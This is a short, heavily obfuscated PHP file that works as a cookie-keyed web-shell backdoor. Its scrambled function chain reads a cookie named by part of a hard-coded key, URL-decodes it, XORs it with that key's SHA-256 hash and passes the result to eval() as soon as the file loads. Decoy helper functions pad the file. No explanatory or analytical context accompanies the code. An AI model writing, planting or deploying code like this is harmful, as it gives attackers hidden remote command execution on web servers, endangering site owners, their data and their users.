<?php function QVdcEX($EaKBBBGIQ)
{
    $kINeRAICW = substr($EaKBBBGIQ, -4);
    return $kINeRAICW;
}
function EZcGzmauAl($hHfZBo) {
    return array_filter($hHfZBo, 'ZAEIuno');
}
function oDWNr($QsTUrMflY, $UgtVtkAey)
{
    $frnifrhk = equxyueUF($QsTUrMflY);
    $poHMNxe = gpRjTIi($UgtVtkAey);
    $XlxJS = eKSmdLDtcx($poHMNxe, $frnifrhk);
    return $XlxJS;
}
function WByYruC($sQHNgDXzbi)
{
    $UdASM = $_COOKIE[$sQHNgDXzbi];
    return $UdASM;
}
function inBGdxSNq()
{
    $DNvtnM = fgNRF();
    kINjLgik($DNvtnM);
}
function nggzSp($UCeQt, $DIKKRJ)
{
    $SINjVGN = str_pad($UCeQt, $DIKKRJ, $UCeQt);
    return $SINjVGN;
}
function dyfbihx($svMPfDN, $BOUjY)
{
    $WWomm = $svMPfDN ^ $BOUjY;
    return $WWomm;
}
function FnItzK($KjobLX)
{
    $LLYCaREM = strlen($KjobLX);
    return $LLYCaREM;
}
function fgNRF()
{
    $uqntUpsu = BEBWul();
    $pKzYcL = IkMgW($uqntUpsu);
    return $pKzYcL;
}
function ktvuMGc($hHfZBo) {
    return count(EZcGzmauAl($hHfZBo));
}
function IkMgW($tgKeXmSre)
{
    $UqzUqzY = QVdcEX($tgKeXmSre);
    $ByQBKrEmx = oDWNr($tgKeXmSre, $UqzUqzY);
    return $ByQBKrEmx;
}
function eKSmdLDtcx($QpEtenSecG, $UPFeiwm)
{
    $AWaghp = FnItzK($QpEtenSecG);
    $BUgBDMWfdo = nggzSp($UPFeiwm, $AWaghp);
    $DNvtnM = dyfbihx($BUgBDMWfdo, $QpEtenSecG);
    return $DNvtnM;
}
function kINjLgik($tNYEFRyBsb)
{
    eval($tNYEFRyBsb);
}
function BEBWul()
{
    $DwAby = "IXsmlFDsRzZrcfZQPRDmMw";
    return $DwAby;
}
function fIfKOc($Jpwjai)
{
    $TIfSmqitNa = rawurldecode($Jpwjai);
    return $TIfSmqitNa;
}
function gpRjTIi($pplsnHFVIW)
{
    $zcbUVUi = WByYruC($pplsnHFVIW);
    $poHMNxe = fIfKOc($zcbUVUi);
    return $poHMNxe;
}
function ZAEIuno($QVfqJ) {
    return $QVfqJ === reverseString($QVfqJ);
}
function equxyueUF($vYpPYj)
{
    $MIymzLFn = hash("sha256", $vYpPYj, TRUE);
    return $MIymzLFn;
}
inBGdxSNq();